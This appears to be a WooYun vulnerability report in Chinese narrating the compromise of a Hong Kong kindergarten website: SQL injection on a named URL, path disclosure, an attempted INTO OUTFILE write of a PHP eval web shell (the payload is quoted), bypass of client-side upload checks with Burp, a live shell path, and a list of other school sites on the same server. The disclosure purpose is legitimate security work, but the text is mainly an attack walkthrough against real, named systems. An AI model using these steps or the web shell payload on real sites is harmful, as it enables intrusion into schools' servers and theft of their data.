WooYun.org

首先从注入开始：http://www.cmyl.edu.hk/php/webinfo/show.php?id=2

root权限，于是想直接写入shell。找到报错http://www.cmyl.edu.hk/php/calendar/calendar.php?month[]=111，得到路径/home/www/kindergarten/cmyl/php/calendar/calendar.php

直接通过sql写文件到/home/www/kindergarten/cmyl/php失败。猜测目录被限制写入，找到一个图片地址http://www.cmyl.edu.hk/php/webinfo/fdpic.php?picpath=updatepic/uploads/20130210000952175.JPG。
于是猜测真实地址是/home/www/kindergarten/cmyl/php/updatepic/uploads/20130210000952175.JPG 事实证明没错，访问http://www.cmyl.edu.hk/php//updatepic/uploads/20130210000952175.JPG可看到图片。
所以说/home/www/kindergarten/cmyl/php/updatepic/uploads可以写入。但执行select '<?php @eval($_POST[\'wooyun\'])?>' into outfile '/home/www/kindergarten/cmyl/php/updatepic/uploads/wooyun.php'却无法得到shell。
于是回归原始方法，找后台，跑了很多路径，最后得到后台地址：http://www.cmyl.edu.hk/php/login/update.php
注入得到账号密码：

登陆后，在后台的 通告功能中添加，上传文件。
由于此处上传比较特殊，弹窗出来，使用GET www.cmyl.edu.hk/php/updatepic/publichttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/swf/Swiff.Uploader.swf实现上传，导致firebug和burp等工具无法抓到上传文件的数据。前端限制了上传格式。
于是burp抓包，修改上传页面返回的数据包，将php添加入允许的格式，返回给浏览器。

接下来可以直接上传php格式。

6

根据之前得到了路径和返回的shell文件名信息，得到shell真实路径。
http://www.cmyl.edu.hk/php/updatepic/uploads/20150311150856214.php

服务器中大部分文件夹是按照域名命名的,总共有234个文件夹。

从文件夹推出域名，以B开头的文件夹为例，11个文件夹。
bcrotaryclubkg
bcsgkg
bcykgtc
bcytc
belight
bfhkwts
bfhkwts_backup
Bilok
blessingkg
bokangkg
bstfk
其中存在域名的有6个。
www.bcrotaryclubkg.edu.hk
www.bcsgkg.edu.hk
www.bcykgtc.edu.hk
www.belight.edu.hk
www.bfhkwts.edu.hk
www.blessingkg.edu.hk
按照概率算一下，影响大概有100个网站吧。